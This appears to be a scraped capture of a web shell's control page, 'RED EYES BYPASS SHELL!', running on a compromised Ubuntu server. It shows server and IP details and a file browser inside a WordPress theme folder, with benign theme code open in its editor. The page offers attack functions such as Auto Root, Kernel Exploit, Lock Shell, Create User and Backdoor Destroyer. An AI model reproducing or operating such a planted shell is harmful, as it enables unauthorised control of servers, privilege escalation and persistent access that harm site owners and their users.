Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
envo-royal /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1017
B
-rwxr-xr-x
archive.php
611
B
-rwxr-xr-x
comments.php
1.57
KB
-rwxr-xr-x
content-none.php
901
B
-rwxr-xr-x
content.php
500
B
-rwxr-xr-x
footer.php
184
B
-rwxr-xr-x
functions.php
13.89
KB
-rwxr-xr-x
header.php
471
B
-rwxr-xr-x
index.php
313
B
-rwxr-xr-x
page.php
707
B
-rwxr-xr-x
readme.txt
4.09
KB
-rwxr-xr-x
rtl.css
32.45
KB
-rwxr-xr-x
screenshot.png
183.68
KB
-rwxr-xr-x
search.php
715
B
-rwxr-xr-x
sidebar.php
188
B
-rwxr-xr-x
single-elementor_library.php
361
B
-rwxr-xr-x
single.php
918
B
-rwxr-xr-x
style.css
36.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-none.php
<div class="error-template text-center no-content"> <h1> <?php esc_html_e( 'Nothing Found', 'envo-royal' ); ?> </h1> <?php if ( is_home() && current_user_can( 'publish_posts' ) ) : ?> <p> <?php /* translators: %1$s: link to admin area */ printf( wp_kses( __( 'Ready to publish your first post? <a href="%1$s">Get started here</a>.', 'envo-royal' ), array( 'a' => array( 'href' => array() ) ) ), esc_url( admin_url( 'post-new.php' ) ) ); ?> </p> <?php elseif ( is_search() ) : ?> <p> <?php esc_html_e( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'envo-royal' ); ?> </p> <?php get_search_form(); ?> <?php else : ?> <p> <?php esc_html_e( 'It seems we can’t find what you’re looking for. Perhaps searching can help.', 'envo-royal' ); ?> </p> <?php get_search_form(); ?> <?php endif; ?> </div>
Close